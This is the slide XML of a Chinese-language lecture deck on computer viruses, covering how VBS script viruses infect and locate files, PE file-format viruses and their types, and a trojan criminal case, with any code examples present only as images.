            <a:ext cx="7772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indent="790575">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2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是程序开发语言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Visual Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>家族的最新成员，是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的脚本语言。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的语法基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>语言。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VB Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 的帮助手册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBS.CHM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C0A89411-9C21-47A3-80FC-F2DDF48486A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="333375"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>小程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59395" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0607F450-B858-45CD-85A9-FE4B4BF9EF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1549400"/>
            <a:ext cx="3681412"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图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61596557-9780-46B9-820D-C44C75445E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378200"/>
            <a:ext cx="49688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图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACB1178-467D-45D0-B27B-6D6B0216B5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6092825"/>
            <a:ext cx="6223000"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8F203C2-AC33-4268-AD3C-E11507695166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本病毒如何感染</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D7128E-13AB-48EC-AE44-5E8B370A7BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本病毒是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>譬如新欢乐时光病毒可以将自己的代码附加在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件的尾部，并在顶部加入一条调用病毒代码的语句。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2"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780B453-BD6A-42EC-841C-DB4A4D206FCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360488" y="442913"/>
            <a:ext cx="8001000" cy="835025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本病毒如何感染文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B16D127-185A-4DF3-A634-375A94379806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1360488" y="1557338"/>
            <a:ext cx="77724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indent="790575">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0" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>自我复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>感染文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62468" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CA180E2-E9C0-4DE1-A769-32DF064A6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 y="2795588"/>
            <a:ext cx="8964613"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A90E9A6D-F2A8-4C20-B4C3-F95125690A1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331913" y="73025"/>
            <a:ext cx="8001000" cy="835025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本病毒如何搜索目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64515" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47A2E83-98DE-45C9-AB6D-269AA86D0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03313"/>
            <a:ext cx="8991600" cy="575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3FC06B98-A715-499F-B168-722716A72E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="247650"/>
            <a:ext cx="7543800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本病毒例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66563" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ACE476-0C34-40B8-9FB1-C0D3127820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25538"/>
            <a:ext cx="9159875"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71CC544-2944-40A2-BB08-6F5C0D26991C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本病毒例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68611" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95118355-1A9B-4590-8390-84168B85F3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888" y="2349500"/>
            <a:ext cx="890111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AF4B701-9610-4A30-9594-635F069BA603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本病毒例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70659" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5382D8-E561-4C27-95BB-2F7285E0C3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120900"/>
            <a:ext cx="53022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图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73205E88-EF80-49BE-B73B-382D8357A7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573463"/>
            <a:ext cx="75438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A768B64-4377-4E19-B571-25D73D233CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(3)Win32 PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B59BEF-A477-43FC-B41B-5EFAE01BB69E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>病毒？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>病毒是指所有感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件格式文件的病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>分类</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>传统感染型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>感染释放型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>覆盖型</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0F54972A-DB74-4EE2-A9C9-20D66C9592AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>江苏“温柔”木马案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67204471-CB03-4E3F-AAE4-50B444A9F515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从“温柔”木马涉案区域、涉案金额情况看，整个“温柔”系列木马程序“链性”团伙成员涉及四川、重庆、湖南、山东、河南、广东、广西、浙江、安徽、福建、云南、江苏、江西、上海、湖北、海南等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个省市。</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1A98C41-2265-45EA-8AAD-853817BD8685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件格式一览</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="290819" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B3E1D8-7804-4386-8EA2-FC751C48149D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2590800" y="1295400"/>
          <a:ext cx="4038600" cy="4183060"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4038600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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DOS MZ header</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DOS stub</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PE header</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5667">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Section table</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Section 1</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Section 2</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Section ...</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819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1" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:ea typeface="MS Sans Serif"/>
                          <a:cs typeface="MS Sans Serif"/>
                        </a:rPr>
                        <a:t>Section n</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45723" marB="45723"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ACAA673B-1E33-4A8E-ADD0-9D463768D0A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>传统感染型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75779" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAA2AE2-0416-464C-9EF6-3BC14340B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2133600"/>
            <a:ext cx="7489825"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Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E60827-C9E6-4972-92D9-7596512832C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="5805488"/>
            <a:ext cx="7200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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>被感染病毒的程序运行时，可以不用释放病毒体，也可以释放病毒体。</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783F332-33D4-4D95-A6EC-9400E084F6A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77827" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
